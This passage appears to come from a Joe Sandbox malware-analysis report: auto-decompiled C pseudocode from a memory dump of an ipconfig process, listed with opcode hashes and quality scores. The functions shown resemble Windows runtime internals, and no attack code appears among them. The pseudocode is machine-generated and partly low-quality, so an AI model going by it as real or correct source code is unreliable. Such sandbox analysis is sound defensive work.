              					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
              					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
              					if(_t41 == 0) {
              						goto L11;
              					}
              					goto L6;
              				}
              			}











              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b66117e14cdccdd793293f27ce9b662b645660e5fe38027bd4e01d56920e6ef2
              • Instruction ID: 395c4969ef6c5434471a3ab26dc598dd60b95259b3a0d28cf899e6b84fa15d2b
              • Opcode Fuzzy Hash: b66117e14cdccdd793293f27ce9b662b645660e5fe38027bd4e01d56920e6ef2
              • Instruction Fuzzy Hash: 2331FF36A80A199BCB01DF98D981BB6B7A8EF09758F21947CED05DB241E774D906CB80
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 76%
              			E02E99100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
              				signed int _t53;
              				signed int _t56;
              				signed int* _t60;
              				signed int _t63;
              				signed int _t66;
              				signed int _t69;
              				void* _t70;
              				intOrPtr* _t72;
              				void* _t78;
              				void* _t79;
              				signed int _t80;
              				intOrPtr _t82;
              				void* _t85;
              				void* _t88;
              				void* _t89;
              
              				_t84 = __esi;
              				_t70 = __ecx;
              				_t68 = __ebx;
              				_push(0x2c);
              				_push(0x2f6f6e8);
              				E02EED0E8(__ebx, __edi, __esi);
              				 *((char*)(_t85 - 0x1d)) = 0;
              				_t82 =  *((intOrPtr*)(_t85 + 8));
              				if(_t82 == 0) {
              					L4:
              					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
              						E02F688F5(_t68, _t70, _t78, _t82, _t84, __eflags);
              					}
              					L5:
              					return E02EED130(_t68, _t82, _t84);
              				}
              				_t88 = _t82 -  *0x2f886c0; // 0x4007b0
              				if(_t88 == 0) {
              					goto L4;
              				}
              				_t89 = _t82 -  *0x2f886b8; // 0x0
              				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
              					goto L4;
              				} else {
              					E02EB2280(_t82 + 0xe0, _t82 + 0xe0);
              					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
              					__eflags =  *((char*)(_t82 + 0xe5));
              					if(__eflags != 0) {
              						E02F688F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
              						goto L12;
              					} else {
              						__eflags =  *((char*)(_t82 + 0xe4));
              						if( *((char*)(_t82 + 0xe4)) == 0) {
              							 *((char*)(_t82 + 0xe4)) = 1;
              							_push(_t82);
              							_push( *((intOrPtr*)(_t82 + 0x24)));
              							E02EDAFD0();
              						}
              						while(1) {
              							_t60 = _t82 + 8;
              							 *(_t85 - 0x2c) = _t60;
              							_t68 =  *_t60;
              							_t80 = _t60[1];
              							 *(_t85 - 0x28) = _t68;
              							 *(_t85 - 0x24) = _t80;
              							while(1) {
              								L10:
              								__eflags = _t80;
              								if(_t80 == 0) {
              									break;
              								}
              								_t84 = _t68;
              								 *(_t85 - 0x30) = _t80;
              								 *(_t85 - 0x24) = _t80 - 1;
              								asm("lock cmpxchg8b [edi]");
              								_t68 = _t84;
              								 *(_t85 - 0x28) = _t68;
              								 *(_t85 - 0x24) = _t80;
              								__eflags = _t68 - _t84;
              								_t82 =  *((intOrPtr*)(_t85 + 8));
              								if(_t68 != _t84) {
              									continue;
              								}
              								__eflags = _t80 -  *(_t85 - 0x30);
              								if(_t80 !=  *(_t85 - 0x30)) {
              									continue;
              								}
              								__eflags = _t80;
              								if(_t80 == 0) {
              									break;
              								}
              								_t63 = 0;
              								 *(_t85 - 0x34) = 0;
              								_t84 = 0;
              								__eflags = 0;
              								while(1) {
              									 *(_t85 - 0x3c) = _t84;
              									__eflags = _t84 - 3;
              									if(_t84 >= 3) {
              										break;
              									}
              									__eflags = _t63;
              									if(_t63 != 0) {
              										L40:
              										_t84 =  *_t63;
              										__eflags = _t84;
              										if(_t84 != 0) {
              											_t84 =  *(_t84 + 4);
              											__eflags = _t84;
              											if(_t84 != 0) {
              												 *0x2f8b1e0(_t63, _t82);
              												 *_t84();
              											}
              										}
              										do {
              											_t60 = _t82 + 8;
              											 *(_t85 - 0x2c) = _t60;
              											_t68 =  *_t60;
              											_t80 = _t60[1];
              											 *(_t85 - 0x28) = _t68;
              											 *(_t85 - 0x24) = _t80;
              											goto L10;
              										} while (_t63 == 0);
              										goto L40;
              									}
              									_t69 = 0;
              									__eflags = 0;
              									while(1) {
              										 *(_t85 - 0x38) = _t69;
              										__eflags = _t69 -  *0x2f884c0;
              										if(_t69 >=  *0x2f884c0) {
              											break;
              										}
              										__eflags = _t63;
              										if(_t63 != 0) {
              											break;
              										}
              										_t66 = E02F69063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
              										__eflags = _t66;
              										if(_t66 == 0) {
              											_t63 = 0;
              											__eflags = 0;
              										} else {
              											_t63 = _t66 + 0xfffffff4;
              										}
              										 *(_t85 - 0x34) = _t63;
              										_t69 = _t69 + 1;
              									}
              									_t84 = _t84 + 1;
              								}
              								__eflags = _t63;
              							}
              							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
              							 *((char*)(_t82 + 0xe5)) = 1;
              							 *((char*)(_t85 - 0x1d)) = 1;
              							L12:
              							 *(_t85 - 4) = 0xfffffffe;
              							E02E9922A(_t82);
              							_t53 = E02EB7D50();
              							__eflags = _t53;
              							if(_t53 != 0) {
              								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              							} else {
              								_t56 = 0x7ffe0386;
              							}
              							__eflags =  *_t56;
              							if( *_t56 != 0) {
              								_t56 = E02F68B58(_t82);
              							}
              							__eflags =  *((char*)(_t85 - 0x1d));
              							if( *((char*)(_t85 - 0x1d)) != 0) {
              								__eflags = _t82 -  *0x2f886c0; // 0x4007b0
              								if(__eflags != 0) {
              									__eflags = _t82 -  *0x2f886b8; // 0x0
              									if(__eflags == 0) {
              										_t79 = 0x2f886bc;
              										_t72 = 0x2f886b8;
              										goto L18;
              									}
              									__eflags = _t56 | 0xffffffff;
              									asm("lock xadd [edi], eax");
              									if(__eflags == 0) {
              										E02E99240(_t68, _t82, _t82, _t84, __eflags);
              									}
              								} else {
              									_t79 = 0x2f886c4;
              									_t72 = 0x2f886c0;
              									L18:
              									E02EC9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
              								}
              							}
              							goto L5;
              						}
              					}
              				}
              			}



















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5641219af5d5a4373da0847434b1ea824ab7c5e487799383a7ab78f0b3ea2e9
              • Instruction ID: adde01f6001f0f41122d5d947f798514b014b99f192de4b9ae05c8c25724bc51
              • Opcode Fuzzy Hash: f5641219af5d5a4373da0847434b1ea824ab7c5e487799383a7ab78f0b3ea2e9
              • Instruction Fuzzy Hash: 4831C371A81285DFDF25DF69C488BADF7B2BB48398F19D14ED50567242C334A980CF61
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 60%
              			E02EC1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
              				char _v8;
              				intOrPtr _v12;
              				intOrPtr _v16;
              				intOrPtr* _v20;
              				void* _t22;
              				char _t23;
              				void* _t36;
              				intOrPtr _t42;
              				intOrPtr _t43;
              
              				_v12 = __ecx;
              				_t43 = 0;
              				_v20 = __edx;
              				_t42 =  *__edx;
              				 *__edx = 0;
              				_v16 = _t42;
              				_push( &_v8);
              				_push(0);
              				_push(0);
              				_push(6);
              				_push(0);
              				_push(__ecx);
              				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
              				_push(_t36);
              				_t22 = E02EBF460();
              				if(_t22 < 0) {
              					if(_t22 == 0xc0000023) {
              						goto L1;
              					}
              					L3:
              					return _t43;
              				}
              				L1:
              				_t23 = _v8;
              				if(_t23 != 0) {
              					_t38 = _a4;
              					if(_t23 >  *_a4) {
              						_t42 = L02EB4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
              						if(_t42 == 0) {
              							goto L3;
              						}
              						_t23 = _v8;
              					}
              					_push( &_v8);
              					_push(_t23);
              					_push(_t42);
              					_push(6);
              					_push(_t43);
              					_push(_v12);
              					_push(_t36);
              					if(E02EBF460() < 0) {
              						if(_t42 != 0 && _t42 != _v16) {
              							L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
              						}
              						goto L3;
              					}
              					 *_v20 = _t42;
              					 *_a4 = _v8;
              				}
              				_t43 = 1;
              				goto L3;
              			}













              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
              • Instruction ID: d494b24169c3a8beaf4bf4b927aaec308672556b74b6f32c66e4f3106c4e9c85
              • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
              • Instruction Fuzzy Hash: F7218072680118EFC721CF99CD80EABBBB9EF85644F219059F905DB251D670AD02DB90
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 53%
              			E02EB0050(void* __ecx) {
              				signed int _v8;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr* _t30;
              				intOrPtr* _t31;
              				signed int _t34;
              				void* _t40;
              				void* _t41;
              				signed int _t44;
              				intOrPtr _t47;
              				signed int _t58;
              				void* _t59;
              				void* _t61;
              				void* _t62;
              				signed int _t64;
              
              				_push(__ecx);
              				_v8 =  *0x2f8d360 ^ _t64;
              				_t61 = __ecx;
              				_t2 = _t61 + 0x20; // 0x20
              				E02EC9ED0(_t2, 1, 0);
              				_t52 =  *(_t61 + 0x8c);
              				_t4 = _t61 + 0x8c; // 0x8c
              				_t40 = _t4;
              				do {
              					_t44 = _t52;
              					_t58 = _t52 & 0x00000001;
              					_t24 = _t44;
              					asm("lock cmpxchg [ebx], edx");
              					_t52 = _t44;
              				} while (_t52 != _t44);
              				if(_t58 == 0) {
              					L7:
              					_pop(_t59);
              					_pop(_t62);
              					_pop(_t41);
              					return E02EDB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
              				}
              				asm("lock xadd [esi], eax");
              				_t47 =  *[fs:0x18];
              				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
              				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
              				if(_t30 != 0) {
              					if( *_t30 == 0) {
              						goto L4;
              					}
              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
              					L5:
              					if( *_t31 != 0) {
              						_t18 = _t61 + 0x78; // 0x78
              						E02F68A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
              					}
              					_t52 =  *(_t61 + 0x5c);
              					_t11 = _t61 + 0x78; // 0x78
              					_t34 = E02EC9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
              					_t24 = _t34 | 0xffffffff;
              					asm("lock xadd [esi], eax");
              					if((_t34 | 0xffffffff) == 0) {
              						 *0x2f8b1e0(_t61);
              						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
              					}
              					goto L7;
              				}
              				L4:
              				_t31 = 0x7ffe0386;
              				goto L5;
              			}





















              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8efe8456ee2232848eed181757258945e43c314ff5afa0978a2234f82c0c0e14
              • Instruction ID: 705d65740242a5b33aa2460fab4e430ac62e2c30290ea1158d055e02a1778ab5
              • Opcode Fuzzy Hash: 8efe8456ee2232848eed181757258945e43c314ff5afa0978a2234f82c0c0e14
              • Instruction Fuzzy Hash: 2A318F31641B04CFD726CF28C944BA7B3E5FF88718F24996DE59687A90EB75B802CB50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E02F16C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
              				signed short* _v8;
              				signed char _v12;
              				void* _t22;
              				signed char* _t23;
              				intOrPtr _t24;
              				signed short* _t44;
              				void* _t47;
              				signed char* _t56;
              				signed char* _t58;
              
              				_t48 = __ecx;
              				_push(__ecx);
              				_push(__ecx);
              				_t44 = __ecx;
              				_v12 = __edx;
              				_v8 = __ecx;
              				_t22 = E02EB7D50();
              				_t58 = 0x7ffe0384;
              				if(_t22 == 0) {
              					_t23 = 0x7ffe0384;
              				} else {
              					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              				}
              				if( *_t23 != 0) {
              					_t24 =  *0x2f87b9c; // 0x0
              					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
              					_t23 = L02EB4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
              					_t56 = _t23;
              					if(_t56 != 0) {
              						_t56[0x24] = _a4;
              						_t56[0x28] = _a8;
              						_t56[6] = 0x1420;
              						_t56[0x20] = _v12;
              						_t14 =  &(_t56[0x2c]); // 0x2c
              						E02EDF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
              						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
              						if(E02EB7D50() != 0) {
              							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              						}
              						_push(_t56);
              						_push(_t47 - 0x20);
              						_push(0x402);
              						_push( *_t58 & 0x000000ff);
              						E02ED9AE0();
              						_t23 = L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
              					}
              				}
              				return _t23;
              			}













              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b4ff1f79358a19d4ba1fa664d124636908abf1cf237c594941c162d43e054773
              • Instruction ID: c43bf00f6f98ede88cc7572c0287e82eb243a41f4e5a5a1903a4b29384d8c6c6
              • Opcode Fuzzy Hash: b4ff1f79358a19d4ba1fa664d124636908abf1cf237c594941c162d43e054773
              • Instruction Fuzzy Hash: 61217A72A40644ABC716DB68D880F6AB7A8FF48784F144069F905DBB91D734ED11CBA4
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 82%
              			E02ED90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
              				intOrPtr* _v0;
              				void* _v8;
              				signed int _v12;
              				intOrPtr _v16;
              				char _v36;
              				void* _t38;
              				intOrPtr _t41;
              				void* _t44;
              				signed int _t45;
              				intOrPtr* _t49;
              				signed int _t57;
              				signed int _t58;
              				intOrPtr* _t59;
              				void* _t62;
              				void* _t63;
              				void* _t65;
              				void* _t66;
              				signed int _t69;
              				intOrPtr* _t70;
              				void* _t71;
              				intOrPtr* _t72;
              				intOrPtr* _t73;
              				char _t74;
              
              				_t65 = __edx;
              				_t57 = _a4;
              				_t32 = __ecx;
              				_v8 = __edx;
              				_t3 = _t32 + 0x14c; // 0x14c
              				_t70 = _t3;
              				_v16 = __ecx;
              				_t72 =  *_t70;
              				while(_t72 != _t70) {
              					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
              						L24:
              						_t72 =  *_t72;
              						continue;
              					}
              					_t30 = _t72 + 0x10; // 0x10
              					if(E02EED4F0(_t30, _t65, _t57) == _t57) {
              						return 0xb7;
              					}
              					_t65 = _v8;
              					goto L24;
              				}
              				_t61 = _t57;
              				_push( &_v12);
              				_t66 = 0x10;
              				if(E02ECE5E0(_t57, _t66) < 0) {
              					return 0x216;
              				}
              				_t73 = L02EB4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
              				if(_t73 == 0) {
              					_t38 = 0xe;
              					return _t38;
              				}
              				_t9 = _t73 + 0x10; // 0x10
              				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
              				E02EDF3E0(_t9, _v8, _t57);
              				_t41 =  *_t70;
              				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
              					_t62 = 3;
              					asm("int 0x29");
              					_push(_t62);
              					_push(_t57);
              					_push(_t73);
              					_push(_t70);
              					_t71 = _t62;
              					_t74 = 0;
              					_v36 = 0;
              					_t63 = E02ECA2F0(_t62, _t71, 1, 6,  &_v36);
              					if(_t63 == 0) {
              						L20:
              						_t44 = 0x57;
              						return _t44;
              					}
              					_t45 = _v12;
              					_t58 = 0x1c;
              					if(_t45 < _t58) {
              						goto L20;
              					}
              					_t69 = _t45 / _t58;
              					if(_t69 == 0) {
              						L19:
              						return 0xe8;
              					}
              					_t59 = _v0;
              					do {
              						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
              							goto L18;
              						}
              						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
              						 *_t59 = _t49;
              						if( *_t49 != 0x53445352) {
              							goto L18;
              						}
              						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
              						return 0;
              						L18:
              						_t63 = _t63 + 0x1c;
              						_t74 = _t74 + 1;
              					} while (_t74 < _t69);
              					goto L19;
              				}
              				 *_t73 = _t41;
              				 *((intOrPtr*)(_t73 + 4)) = _t70;
              				 *((intOrPtr*)(_t41 + 4)) = _t73;
              				 *_t70 = _t73;
              				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
              				return 0;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction ID: 8ddd475d94877fbdf832df8cf1949344d17e8cc5f477892c1a33016f38466c39
              • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
              • Instruction Fuzzy Hash: F7218E71A40205EFDB21DF59C944AAAF7F8EF54754F15C86AEA49A7201D330ED01CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 59%
              			E02EC3B7A(void* __ecx) {
              				signed int _v8;
              				char _v12;
              				intOrPtr _v20;
              				intOrPtr _t17;
              				intOrPtr _t26;
              				void* _t35;
              				void* _t38;
              				void* _t41;
              				intOrPtr _t44;
              
              				_t17 =  *0x2f884c4; // 0x0
              				_v12 = 1;
              				_v8 =  *0x2f884c0 * 0x4c;
              				_t41 = __ecx;
              				_t35 = L02EB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x2f884c0 * 0x4c);
              				if(_t35 == 0) {
              					_t44 = 0xc0000017;
              				} else {
              					_push( &_v8);
              					_push(_v8);
              					_push(_t35);
              					_push(4);
              					_push( &_v12);
              					_push(0x6b);
              					_t44 = E02EDAA90();
              					_v20 = _t44;
              					if(_t44 >= 0) {
              						E02EDFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x2f884c0 * 0xc);
              						_t38 = _t35;
              						if(_t35 < _v8 + _t35) {
              							do {
              								asm("movsd");
              								asm("movsd");
              								asm("movsd");
              								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
              							} while (_t38 < _v8 + _t35);
              							_t44 = _v20;
              						}
              					}
              					_t26 =  *0x2f884c4; // 0x0
              					L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
              				}
              				return _t44;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 882c1f754af0dc89a6637538f67b7cc91184b4ea5c447cf024aa42394626d0bf
              • Instruction ID: c37d5b929047fb6a8ae0b0a73734e5b1d633629d6e41d73e3c181bf19214aa1e
              • Opcode Fuzzy Hash: 882c1f754af0dc89a6637538f67b7cc91184b4ea5c447cf024aa42394626d0bf
              • Instruction Fuzzy Hash: B721A172A40118AFC700DF98CE81FAAB7AEFB44348F2550A9E9049B251C371AD52CBA0
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 80%
              			E02F16CF0(void* __edx, intOrPtr _a4, short _a8) {
              				char _v8;
              				char _v12;
              				char _v16;
              				char _v20;
              				char _v28;
              				char _v36;
              				char _v52;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				signed char* _t21;
              				void* _t24;
              				void* _t36;
              				void* _t38;
              				void* _t46;
              
              				_push(_t36);
              				_t46 = __edx;
              				_v12 = 0;
              				_v8 = 0;
              				_v20 = 0;
              				_v16 = 0;
              				if(E02EB7D50() == 0) {
              					_t21 = 0x7ffe0384;
              				} else {
              					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
              				}
              				if( *_t21 != 0) {
              					_t21 =  *[fs:0x30];
              					if((_t21[0x240] & 0x00000004) != 0) {
              						if(E02EB7D50() == 0) {
              							_t21 = 0x7ffe0385;
              						} else {
              							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
              						}
              						if(( *_t21 & 0x00000020) != 0) {
              							_t56 = _t46;
              							if(_t46 == 0) {
              								_t46 = 0x2e75c80;
              							}
              							_push(_t46);
              							_push( &_v12);
              							_t24 = E02ECF6E0(_t36, 0, _t46, _t56);
              							_push(_a4);
              							_t38 = _t24;
              							_push( &_v28);
              							_t21 = E02ECF6E0(_t38, 0, _t46, _t56);
              							if(_t38 != 0) {
              								if(_t21 != 0) {
              									E02F17016(_a8, 0, 0, 0,  &_v36,  &_v28);
              									L02EB2400( &_v52);
              								}
              								_t21 = L02EB2400( &_v28);
              							}
              						}
              					}
              				}
              				return _t21;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c9a356ecde0cd970b4abab5f700680fa11468789117fb72eb48aaa318287d87e
              • Instruction ID: 4504e347273e662df123a0565f5f8ab2d2203366686b01f0f67f05e88e796ea9
              • Opcode Fuzzy Hash: c9a356ecde0cd970b4abab5f700680fa11468789117fb72eb48aaa318287d87e
              • Instruction Fuzzy Hash: C52104729003459BC312EF6AC944BABB7EDEF82784F44485AFE41C7250E734D909CAA2
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E02F6070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
              				char _v8;
              				intOrPtr _v11;
              				signed int _v12;
              				intOrPtr _v15;
              				signed int _v16;
              				intOrPtr _v28;
              				void* __ebx;
              				char* _t32;
              				signed int* _t38;
              				signed int _t60;
              
              				_t38 = __ecx;
              				_v16 = __edx;
              				_t60 = E02F607DF(__ecx, __edx,  &_a4,  &_a8, 2);
              				if(_t60 != 0) {
              					_t7 = _t38 + 0x38; // 0x29cd5903
              					_push( *_t7);
              					_t9 = _t38 + 0x34; // 0x6adeeb00
              					_push( *_t9);
              					_v12 = _a8 << 0xc;
              					_t11 = _t38 + 4; // 0x5de58b5b
              					_push(0x4000);
              					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
              					E02F5AFDE( &_v8,  &_v12);
              					E02F61293(_t38, _v28, _t60);
              					if(E02EB7D50() == 0) {
              						_t32 = 0x7ffe0380;
              					} else {
              						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
              					}
              					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
              						_t21 = _t38 + 0x3c; // 0xc3595e5f
              						E02F514FB(_t38,  *_t21, _v11, _v15, 0xd);
              					}
              				}
              				return  ~_t60;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction ID: dd9b5af3101a2fa070e39e5ed2e8731fc2407a1c33fc78f25a82b8a2a3e513fe
              • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
              • Instruction Fuzzy Hash: 9B21D0366042049FD705DF18C884B6ABBA6FBC4390F14866DFA958B385DB30D909CB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 96%
              			E02EBAE73(intOrPtr __ecx, void* __edx) {
              				intOrPtr _v8;
              				void* _t19;
              				char* _t22;
              				signed char* _t24;
              				intOrPtr _t25;
              				intOrPtr _t27;
              				void* _t31;
              				intOrPtr _t36;
              				char* _t38;
              				signed char* _t42;
              
              				_push(__ecx);
              				_t31 = __edx;
              				_v8 = __ecx;
              				_t19 = E02EB7D50();
              				_t38 = 0x7ffe0384;
              				if(_t19 != 0) {
              					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              				} else {
              					_t22 = 0x7ffe0384;
              				}
              				_t42 = 0x7ffe0385;
              				if( *_t22 != 0) {
              					if(E02EB7D50() == 0) {
              						_t24 = 0x7ffe0385;
              					} else {
              						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              					}
              					if(( *_t24 & 0x00000010) != 0) {
              						goto L17;
              					} else {
              						goto L3;
              					}
              				} else {
              					L3:
              					_t27 = E02EB7D50();
              					if(_t27 != 0) {
              						_t27 =  *[fs:0x30];
              						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
              					}
              					if( *_t38 != 0) {
              						_t27 =  *[fs:0x30];
              						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
              							goto L5;
              						}
              						_t27 = E02EB7D50();
              						if(_t27 != 0) {
